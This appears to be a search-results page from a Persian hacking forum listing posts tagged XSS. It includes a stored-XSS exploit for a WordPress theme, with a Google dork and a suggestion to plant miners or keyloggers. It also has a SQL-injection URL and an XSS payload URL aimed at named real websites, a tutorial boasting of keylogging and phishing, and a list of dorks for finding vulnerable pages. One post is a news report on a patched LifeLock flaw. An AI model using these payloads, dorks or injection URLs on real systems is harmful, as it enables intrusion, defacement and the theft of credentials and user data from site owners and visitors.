جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'xss'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • اخبار هک و امنیت
    • انتقادات و پیشنهادات
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • بخش کرک و رمزنگاری
    • ابزار کرک
    • مقالات و آموزشهای کرک
    • مقالات و آموزشهای رمزنگاری
    • ابزارهای رمزنگاری
    • پروکسی لیست
    • پسورد لیست و کمبو لیست
    • کانفیگ
    • اکانت های کرک شده
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
  • الکترونيک و روباتيک
  • گرافيک
  • متفرقه

جستجو در ...

نمایش نتایجی که شامل ...


تاریخ ایجاد

  • شروع

    پایان


آخرین بروزرسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


Website URL


Yahoo


Skype


محل سکونت

10 نتیجه پیدا شد

  1. https://cxsecurity.com/issue/WLB-2018040113 ################################################## # Title : Nielsen Wordpress Theme Xss Stored Exploit # Date : 14 April 2018 # Author : GIST # Version : 1.4.1 # Google Dork : inurl:/wp-content/themes/nielsen # Youtube : # Tested on : Ubuntu # Vendor : https://themeforest.net/item/nielsen-ecommerce-wordpress-theme/9710159 ################################################## Description : Nielsen is a truly user-oriented e-commerce theme, with a multiconcept layout and a lot of advanced features to enhance your shop. There are more than 4.000 website that installed this theme. You Can Put Your Javascripts Code and Run it on website or you can Inject Your scripts (Miner or Keylogger) Xss : First Open Enter Google Dork And open Your target. then open an post and go to Comments section Then Put your script and post it. Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> or Enter Your Deface Page Source
  2. سلام دوستان یه سایت(چت روم خارجی) رو اسکن کردم که باگ xss داره ولی نمیدونم چجوری باید به این باگ نفوذ کرد نتیجه اسکن دوتا روش تو انجمن دیدم که یکی تزریق این کد بود <script>alert(document.cookie)</script> ولی وقتی اینو تو قسمت عمومی چت روم میفرستم کوکی هایی رو میده که تو مرورگر خودم هست و روش دوم ریختن اسکریپت کیلاگر توسط باگ xss بود که اینم باید تو ادمین پیج انجام میدادی که نمیشد وقتی سایت رو اسکن کردم vega یه سری کوکی هم اوورد به نظرتون اونا بدرد میخوره !!!! whatweb هم یه سری کوکی بهم داد اینا به کار میان !!! سایت cpanel داره راهی برای نفوذ به cpanel هست !! از ابزار brutesploit میشه تو پیج ادمین استفاده کرد !!! یا تو صفحه ورود ! از این ابزار برای کرک کردن پسوورد ایمیل میشه استفاده کرد ! سایت یه سری پورت باز داره که نمیدونم به کار میاد یا نه ! لطفا راهنمایی کنید 25-53-80-110-119-143 ============================================================================================================================================================== و سایت دوم که باگ sql داشت (این سوال رو یبار پرسیدم ولی جوابی نگرفتم ) من تو قسمت فراخوانی تیبل ادمین مشکل دارم این سایت دارای باگ = http://www.jabrennan.com اینم تمام تیبل هایی که داره = CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE من تیبل USER رو به هگز=(0x55534552) تبدیل کردم و دستورات رو به این شکل وارد کردم ولی نتیجه ای نگرفتم ! http://www.jabrennan.com/news_display.php?id=-1397+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+%20information_schema.columns+where+table_name=0x55534552-- اساتید لطفا راهنمایی کنید
  3. این تاپیک ایجاد شده تا تارگت های باگِ xss برای تمرین در اینجا قرار داده بشه لطفا هیچ سوالی درباره این باگ اینجا نپرسید بزودی هم تاپیک آموزشی درباره این باگ میزنیم لطفا فقط قسمت آسیب پذیر سایت رو در اینجا قرار دهید با تشکر
  4. با آموزش تصویری باگ XSS در خدمت شما اعضای خوبمون هستم و در این فیلم آموزشی طریقه بدست آوردن کوکی cookie در باگ xss را بشما آموزش میدم . فیلم با توضیحات کامل ضبط کردم. پسورد : guardiran.org XSS Cookie.rar
  5. درود ضمن قبولی طاعات و عبادات این اموزشی که براتون اماده کردم درباره ریختن کیلاگر در سایتی هست که اسیب پذیر هست اگه در کد ها مشکلی بود اطلاع بدید درستشون کنم اکثر دوستان فکر میکنند که باگ xss یا همون css کارایی خاصی نداره چون باگ سمت کلاینت هست منم اول همینطوری فکر میکردم دیگه حداکثر کاری که باهش کرد کش روفتن کوکی ها هست ولی اینطور نیست کیلاگر تازه یک جلوه بسیار کم از xss هست چون وقتی ما بتونیم اسکریپت تو کد های html قرار بدیم همه کار میتونیم بکنیم یک چیزی که من خیلی دوست دارم فیشینگ هست که راحت اطلاعات کاربران رو برداریم اسکریپت هم همراه فیلم پیوست کردم بسیار ساده میتونیم یک کیلاگر بزاریم و اطلاعات رو بدزدیم حالا شما فکر کنید یک سایت معروف مثل بانک این باگ رو بده .....!!! xss.rar *****استقبال خوب باشه روش های دیگه رو هم اموزش میدم *********
  6. LifeLock یک شرکت آمریکایی است که خدماتی جهت محافظت از مشتریان در مقابل «سرقت هویت» را ارائه می‌کند. منظور از سرقت هویت، جعل و سوء‌استفاده از هویت افراد در خدمات بانکی و اعتباری و سایر موارد اجتماعی است. به گزارش محققان امنیتی در وب‌گاه این شرکت یک آسیب‌پذیری XSS۱ را کشف کرده‌اند که به مهاجم این امکان را می‌دهد که با ایجاد یک صفحه‌ی جعلیِ ورود به حساب کاربری، شناسه‌ها و گذرواژه‌های مشتریان را جمع‌آوری نماید. LifeLock بلافاصله پس از شناسایی این آسیب‌پذیری توسط دو محقق امنیتی به نام اریک تیلور و بلک ولش، آن را وصله کرده‌اند. این آسیب‌پذیری در صفحه‌‌ای از این وب‌گاه کشف شده است که مربوط به معرفی این شرکت به سایر دوستان است و با عنوان Refer Friend شناخته می‌شود. آسیب‌پذیری در حالی توسط محققین کشف شد که آن‌ها متوجه یک پارامتر به صورت کد HTML در آدرس URL صفحه‌‌‌ی آسیب‌پذیر شدند، و به این ترتیب با بررسی تزریق سایر کدها به URL متوجه شدند که به راحتی می‌توان از این آسیب‌پذیری در کمپین‌های فیشینگ استفاده نمود. این دست آسیب‌پذیری‌ها، بسیار شایع است و مهم عکس‌العمل سریع مسئولان شرکت است تا این آسیب‌پذیری را وصله نمایند و مانع از بروز خسارات سایبری زیادی شوند.
  7. سلام خدمت همه دوستان باگ XSS رو همه میشناسن دیگه توضیح نمیدم اموزشهاش تو انجمن هست امروز میخوام اموزش این باگ در url رو بدم ما تو این روش هیچ پارامتر ورودی رو نداریم مثلا id یا newstitle و ... linke Exploit : https://cxsecurity.com/issue/WLB-2015080082 Target : http://www.habervespor.com/haberleri این خط رو به ادرس اضافه کنید r3nw4"</title>'>><BoDy!><BODY onpageshow=prompt(/XSSPOSED/)></ ادرس میشه : http://www.habervespor.com/haberleri//r3nw4%22%3C/title%3E%27%3E%3E%3CBoDy!%3E%3CBODY%20onpageshow=prompt%28/XSSPOSED/%29%3E%3C/ میبینید که script اجرا میشه :D
  8. سلام اگه میشه آموزش باگxss رو بذارید و چجور بتونیم به سایت نفوذ کنیم . دیتا بیس سایت رو هم بیرون بیاریم
  9. C0d3!Nj3ct!0n

    دورک های باگ xss

    دورک های XSS inurl:".php?cmd=" inurl:".php?z=" inurl:".php?q=" inurl:".php?search=" inurl:".php?query=" inurl:".php?searchstring=" inurl:".php?keyword=" inurl:".php?file=" inurl:".php?years=" inurl:".php?txt=" inurl:".php?tag=" inurl:".php?max=" inurl:".php?from=" inurl:".php?author=" inurl:".php?pass=" inurl:".php?feedback=" inurl:".php?mail=" inurl:".php?cat=" inurl:".php?vote=" inurl:search.php?q= inurl:com_feedpostold/feedpost.php?url= inurl:scrapbook.php?id= inurl:headersearch.php?sid= inurl:/poll/default.asp?catid= inurl:/search_results.php?search=
  10. با سلام همونطور که شما دوستان می دونید باگ XSS مخفف Cross Site Scripting هست و قصد دارم در این تاپیک بای پس های باگ ( Xss Bypass Command ) را برای اعضاء محترم تیم امنیتی گارد ایران قرار میدم . لطفا اسپم ندید